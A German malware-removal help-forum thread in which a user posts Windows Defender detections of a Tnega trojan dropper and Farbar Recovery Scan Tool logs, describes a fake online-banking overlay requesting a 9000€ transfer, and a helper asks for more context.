Überprüfungsparameter: Vollständige Überprüfung

Benutzer: PC5-L\buskr5
 

Date: 2021-01-07 19:00:40.2340000Z

Description: 

Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.

Weitere Informationen:

https://go.microsoft.com/fwlink/?linkid=37020&name=App:Chip_Updater_BundleInstaller&threatid=268628&enterprise=0

Name: App:Chip_Updater_BundleInstaller

ID: 268628

Schweregrad: Niedrig

Kategorie: Potenziell unerwünschte Software

Pfad: file:_C:\Users\buskr5\Downloads\Photo Lab - CHIP-Installer.exe

Erkennungsursprung: Lokaler Computer

Erkennungstype: Konkret

Erkennungsquelle: Echtzeitschutz

Benutzer: PC5-L\buskr5

Prozessname: C:\Windows\explorer.exe

Sicherheitsversion: AV: 1.329.1821.0, AS: 1.329.1821.0, NIS: 1.329.1821.0

Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4
 

Date: 2021-01-07 18:42:53.8270000Z

Description: 

Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.

Weitere Informationen:

https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0

Name: TrojanDropper:Win64/Tnega!MSR

ID: 2147771646

Schweregrad: Schwerwiegend

Kategorie: Trojaner - Dropper

Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe

Erkennungsursprung: Lokaler Computer

Erkennungstype: Konkret

Erkennungsquelle: Echtzeitschutz

Benutzer: PC5-L\buskr5

Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Sicherheitsversion: AV: 1.329.1821.0, AS: 1.329.1821.0, NIS: 1.329.1821.0

Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4
 

Date: 2021-01-07 17:18:27.4560000Z

Description: 

Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.

Weitere Informationen:

https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0

Name: TrojanDropper:Win64/Tnega!MSR

ID: 2147771646

Schweregrad: Schwerwiegend

Kategorie: Trojaner - Dropper

Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe

Erkennungsursprung: Lokaler Computer

Erkennungstype: Konkret

Erkennungsquelle: Echtzeitschutz

Benutzer: PC5-L\buskr5

Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Sicherheitsversion: AV: 1.329.1817.0, AS: 1.329.1817.0, NIS: 1.329.1817.0

Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4
 

CodeIntegrity:

===================================
 

Date: 2021-01-09 15:09:10.7150000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

Date: 2021-01-09 15:09:10.7130000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

Date: 2021-01-09 15:08:55.6300000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

Date: 2021-01-09 15:08:55.6270000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

Date: 2021-01-09 15:08:42.4780000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

Date: 2021-01-09 15:08:42.4760000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

Date: 2021-01-09 15:08:12.9770000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

Date: 2021-01-09 15:08:12.9750000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

==================== Speicherinformationen =========================== 
 

BIOS: FUJITSU // Insyde Software Corp. Version 2.05 06/25/2019

Hauptplatine: FUJITSU FJNBB5C

Prozessor: Intel(R) Core(TM) i3-6006U CPU @ 2.00GHz

Prozentuale Nutzung des RAM: 46%

Installierter physikalischer RAM: 8088.56 MB

Verfügbarer physikalischer RAM: 4324.07 MB

Summe virtueller Speicher: 9368.56 MB

Verfügbarer virtueller Speicher: 5754.91 MB
 

==================== Laufwerke ================================
 

Drive c: () (Fixed) (Total:237.32 GB) (Free:164.78 GB) NTFS
 

\\?\Volume{d4bd63c3-9f0a-44ee-af4e-35806701b471}\ () (Fixed) (Total:0.49 GB) (Free:0.47 GB) NTFS

\\?\Volume{60a0e813-3eea-47c5-87e8-d6c29f22d114}\ () (Fixed) (Total:0.55 GB) (Free:0.08 GB) NTFS

\\?\Volume{ff4dfa97-53c2-4020-9f39-7bdc41872594}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
 

==================== MBR & Partitionstabelle ====================
 

==========================================================

Disk: 0 (Protective MBR) (Size: 238.5 GB) (Disk ID: 00000000)
 

Partition: GPT.
 

==================== Ende von Addition.txt =======================

Zitat:

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR

Also ein bisschen ausführlicher darfs schon sein. Du hast nur die Überschrift gemacht und dann kommentarlos die Logs reingeknallt. Was wurde denn am Rechner zuvor gemacht?

Zitat:

Benutzer: PC5-L\buskr5

Wenn dieses Benutzerkonto betroffen ist muss man auch sinnigerweise die Logs von diesem User auch aus erstellen und diesem ggf. vorher Adminrechte geben falls er die nicht hat.

Dann seh ich da auch was von DATEV. Nutzt man das privat oder ist das ein gewerblich genutzter PC?

Hallo Cosinus,

vielen dank für deine schnelle Antwort.

Dies war mein erster Forumeintrag überhaupt.

Das Thema mit diesem Trojaner ist schon ein Paar mal hier Thematisiert worden. Deswegen hielt ich mich mit langen Ansprechen etwas zurück.

Der PC wird 99% Privat genutzt. Nur das übermitteln der daten an DATEV findet von diesem PC aus statt. Dies wurde noch nicht entkoppelt da es etwas Aufwand bedeutet dies auf einen anderen PC zu übertragen.

Ich habe einen kompletten Scan mit Win Defender gemacht: Es kamen nur solche sachen wie Chip Installer. Diese habe ich gelöscht. Auch der ADW Cleaner hat noch etwas von Chip gefunden. Auch dieses wurde gelöscht.

Jetzt kommt aber wie in den anderen Themen schon behandelt dauerhaft der Win64/Tnega!MSR im defender.

Wenn ich Online Banking machen will schaltet sich eine Identisch aussehende Seite davor und möchte eine Überweisung von 9000€ generieren.

Jetzt folen gleich die zwei logs aus dem Benutzerkonto buskr5

Code:

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021

durchgeführt von buskr5 (09-01-2021 18:12:15)

Gestartet von C:\Users\buskr5\Downloads

Windows 10 Pro Version 20H2 19042.685 (X64) (2020-07-16 07:02:22)

Start-Modus: Normal

==========================================================
 
 

==================== Konten: =============================
 

Administrator (S-1-5-21-4192198180-2913720414-2796424460-500 - Administrator - Disabled)

buskr5 (S-1-5-21-4192198180-2913720414-2796424460-1002 - Limited - Enabled) => C:\Users\buskr5

DefaultAccount (S-1-5-21-4192198180-2913720414-2796424460-503 - Limited - Disabled)

Gast (S-1-5-21-4192198180-2913720414-2796424460-501 - Limited - Disabled)

ITMueller (S-1-5-21-4192198180-2913720414-2796424460-1001 - Administrator - Enabled) => C:\Users\ITMueller

WDAGUtilityAccount (S-1-5-21-4192198180-2913720414-2796424460-504 - Limited - Disabled)
 

==================== Sicherheits-Center ========================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
 

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 

==================== Installierte Programme ======================
 

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
 

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)

ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 10.100.404.117 - Alps Electric)

Apple Application Support (32-Bit) (HKLM-x32\...\{9738288C-21BC-4F54-AB4F-72F059339376}) (Version: 8.6 - Apple Inc.)

Apple Application Support (64-Bit) (HKLM\...\{DEB339C1-2687-43AB-816A-8714F3E26846}) (Version: 8.6 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{C788AE25-3D4E-4D18-811B-3219F778487E}) (Version: 13.5.1.2 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{A3985C05-7386-411F-A4BF-32A73F37EB44}) (Version: 2.6.3.1 - Apple Inc.)

Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)

DATEV Belegtransfer V.3.5 (HKLM-x32\...\{EC561A24-754E-44F1-B76F-2FDA3DF9E912}) (Version: 2.03 - DATEV eG)

DisplayLink Graphics Driver (HKLM\...\{113EF6B6-57CF-41EA-9F1B-BA50345EDEA5}) (Version: 9.0.1651.0 - DisplayLink Corp.)

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)

Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden

HP Dropbox Plugin (HKLM-x32\...\{1E18E86D-632C-48B5-962C-B60C2E53A478}) (Version: 36.0.41.58587 - HP)

HP Google Drive Plugin (HKLM-x32\...\{039DDA62-50CC-4E7F-9D54-7CF032A2D362}) (Version: 36.0.41.58587 - HP)

HP OfficeJet Pro 7740 series - Grundlegende Software für das Gerät (HKLM\...\{D2C5832A-0287-445C-845F-E53F332C8A18}) (Version: 40.12.1161.1896 - HP Inc.)

HP OfficeJet Pro 7740 series Hilfe (HKLM-x32\...\{5DA0FF5D-80F6-406A-A385-033BA7CBE6B8}) (Version: 39.0.0 - HP)

Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 24.20.100.6290 - Intel Corporation)

iTunes (HKLM\...\{D63C9A58-8F6C-4765-A7B7-6F7711707F46}) (Version: 12.10.8.5 - Apple Inc.)

KOBIL CCID driver x64x86 (HKLM-x32\...\{C5CBEBFF-3DB4-4271-A706-757BBE3BD5AE}) (Version: 1.018.03071 - KOBIL Systems) Hidden

MediaHuman YouTube to MP3 Converter 3.9.9.46 (HKLM-x32\...\MediaHuman YouTube to MP3 Converter_is1) (Version: 3.9.9.46 - MediaHuman)

Microsoft 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.13426.20404 - Microsoft Corporation)

Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)

Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )

Microsoft OneDrive (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)

Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)

Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (HKLM-x32\...\{e2ee15e2-a480-4bc5-bfb7-e9803d1d9823}) (Version: 14.12.25810.0 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27027 (HKLM-x32\...\{fd9b6070-d13e-45dc-819b-41806bf45b6b}) (Version: 14.16.27027.1 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 (HKLM-x32\...\{56e11d69-7cc9-40a5-a4f9-8f6190c4d84d}) (Version: 14.12.25810.0 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27027 (HKLM-x32\...\{39e28474-b67b-4209-af1b-e9ad0a83d8ca}) (Version: 14.16.27027.1 - Microsoft Corporation)

Mietbus (HKLM-x32\...\ST4UNST #1) (Version:  - )

Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.8816.1 - Realtek Semiconductor Corp.)

Screenpresso (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Screenpresso) (Version: 1.8.4.0 - Learnpulse)

Shrew Soft VPN Client (HKLM\...\Shrew Soft VPN Client) (Version:  - )

Sicherheitspaket compact (HKLM-x32\...\{0FA40302-24BC-4235-8717-CCAB7D5A3AC2}) (Version: 6.8.102.20294 - DATEV eG) Hidden

Sicherheitspaket compact (HKLM-x32\...\{480df3d6-f2a5-4f2c-8ee3-3079eefa1c61}) (Version: 6.8.102.20294 - DATEV eG)

Sicherheitspaket compact VDST (HKLM-x32\...\{1277C975-FD21-4782-BFD3-6D7BAB7AF466}) (Version: 6.1.100.18178 - DATEV eG) Hidden

Sicherheitspaket compact x64 (HKLM\...\{FE909D88-4863-45D2-9FFB-61CB2DD592F0}) (Version: 6.8.102.20294 - DATEV eG) Hidden

TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.12.4 - TeamViewer)

Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{32DC821E-4A7D-4878-BEE8-337FA153D7F2}) (Version: 2.63.0.0 - Microsoft Corporation) Hidden

Zoom (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\ZoomUMX) (Version: 5.1 - Zoom Video Communications, Inc.)
 

Packages:

=========

HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_122.1.778.0_x64__v10z8vjag6ke6 [0000-00-00] (HP Inc.)

Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [0000-00-00] (Microsoft Corporation)

Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [0000-00-00] (Microsoft Corporation) [MS Ad]

Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [0000-00-00] (Microsoft Corporation) [MS Ad]

Phototastic Collage -> C:\Program Files\WindowsApps\ThumbmunkeysLtd.PhototasticCollage_3.23.1.0_x64__nfy108tqq3p12 [0000-00-00] (Thumbmunkeys Ltd)
 

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Keine Datei

ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxDTCM.dll [2018-11-14] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
 

==================== Codecs (Nicht auf der Ausnahmeliste) ====================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
 

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Drivers32: [vidc.spv1] => C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\ScreenpressoCodec.dll [167656 2021-01-09] (Learnpulse -> LearnPulse)
 

==================== Verknüpfungen & WMI ========================
 

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============
 

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========
 

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================
 

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================
 

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========
 

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)

BHO: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO64002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)

BHO-x32: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)

Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
 

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\bstbk-vollmachtsdatenbank.de -> hxxp://bstbk-vollmachtsdatenbank.de

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\bstbk-vollmachtsdatenbank.de -> hxxps://bstbk-vollmachtsdatenbank.de

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\datev.de -> hxxp://download.datev.de

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\datev.de -> hxxps://download.datev.de

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\sharepoint.com -> hxxps://rswm-files.sharepoint.com
 

==================== Hosts Inhalt: =========================
 

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
 

2018-04-12 00:38 - 2018-04-12 00:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
 

==================== Andere Bereiche ===========================
 

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
 

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\buskr5\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img-20170430-wa0003.jpg

DNS Servers: 192.168.178.1

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )

 ist aktiviert.
 

Network Binding:

=============

Ethernet: Shrew Soft Lightweight Filter -> vflt (enabled) 

WLAN: Shrew Soft Lightweight Filter -> vflt (enabled) 
 

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
 

HKLM\...\StartupApproved\StartupFolder: => "ControlCenter.lnk"

HKLM\...\StartupApproved\Run: => "RTHDVCPL"

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\StartupApproved\Run: => "OneDrive"
 

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

FirewallRules: [{166A50AB-BA35-4DC0-94F9-86E3C7612B7F}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\FaxApplications.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{E39623A3-4694-43EA-861D-846DE1BBE081}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{41F20948-57E6-48C0-B787-8E350E0F4AE3}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\SendAFax.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{9EC5C841-0316-4C4C-8AC6-5D47D1515E43}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\FaxPrinterUtility.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{2C47819B-0C76-41E7-8951-FF9884032B29}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{A528EDB2-5B14-4C19-840E-E50161882359}] => (Allow) LPort=5357

FirewallRules: [{35A9C84E-C44A-4EB6-A179-101E53499E5B}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)

FirewallRules: [{DF2A37A0-22B5-4F56-BEF2-D55F24A9E8A6}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS65B4\HPDiagnosticCoreUI.exe => Keine Datei

FirewallRules: [{6C39964B-8607-462D-BADE-7B852BCE9A96}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS65B4\HPDiagnosticCoreUI.exe => Keine Datei

FirewallRules: [{DEC7E16E-33C1-4DE9-A3C5-D9205AEE5645}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS6950\HPDiagnosticCoreUI.exe => Keine Datei

FirewallRules: [{24C9FA9C-13A2-43E7-A79D-703A70335C05}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS6950\HPDiagnosticCoreUI.exe => Keine Datei

FirewallRules: [{65C8E351-555D-4A86-9AB3-CD29636B7DA9}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{E69D8B9E-7CEB-410C-8145-C81E4CCB8E77}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{BC66B58C-B648-4497-889E-7FB43E3E140B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{9CF1E217-96B2-4C50-B89D-32E490BC3A5D}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{C0B9ABF0-C6CA-44B7-9DF8-6AE21BACF8B7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [{EBD4A9EA-A5CF-42F3-999B-FC71F044B516}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)

FirewallRules: [TCP Query User{6A280486-017D-4867-948B-EF1175A2B9A1}C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe => Keine Datei

FirewallRules: [UDP Query User{3098913F-3817-46A9-B646-AEE9F468614B}C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe => Keine Datei

FirewallRules: [{24B5A986-5521-4ED0-9467-91D2225031A8}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)

FirewallRules: [{7510E694-223F-4E51-80DD-869688F9BE1F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

FirewallRules: [{5EDC0426-307F-4140-BC21-6F42F1A6D414}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

FirewallRules: [{ACF9D1E2-41C9-4BCA-BFDE-C58E7AEB1799}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

FirewallRules: [{9C443C88-A482-48E0-A390-269EC8292DA5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

FirewallRules: [{C2472821-64AA-418D-B658-F3DC8B7D5DC9}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
 

==================== Wiederherstellungspunkte =========================
 

ACHTUNG: Systemwiederherstellung ist deaktiviert (Total:237.32 GB) (Free:165.13 GB) (70%)

Überprüfen Sie den "VSS" Dienst
 
 

==================== Fehlerhafte Geräte im Gerätemanager ============
 

Name: Shrew Soft Virtual Adapter

Description: Shrew Soft Virtual Adapter

Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}

Manufacturer: Shrew Soft

Service: vnet

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 

==================== Fehlereinträge in der Ereignisanzeige: ========================
 

Applikationsfehler:

==================

Error: (01/07/2021 06:49:16 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)

Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).
 

Error: (01/02/2021 03:32:14 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Name der fehlerhaften Anwendung: ImagingDevices.exe, Version: 10.0.19041.1, Zeitstempel: 0x5fcdec8b

Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000

Ausnahmecode: 0xc0000005

Fehleroffset: 0x03233f2e

ID des fehlerhaften Prozesses: 0x285c

Startzeit der fehlerhaften Anwendung: 0x01d6e10e6233e2ba

Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Pfad des fehlerhaften Moduls: unknown

Berichtskennung: 3506c912-b109-489b-8830-af7cc925d766

Vollständiger Name des fehlerhaften Pakets: 

Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
 

Error: (12/31/2020 02:05:44 PM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 4c0
 

Startzeit: 01d6df75472ad580
 

Beendigungszeit: 0
 

Anwendungspfad: C:\Windows\explorer.exe
 

Bericht-ID: 50412b09-f1e4-4dee-b71c-7bcde27d67b3
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Unknown
 

Error: (12/31/2020 02:04:42 PM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm EXCEL.EXE Version 16.0.13426.20404 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 838
 

Startzeit: 01d6df7570957287
 

Beendigungszeit: 24
 

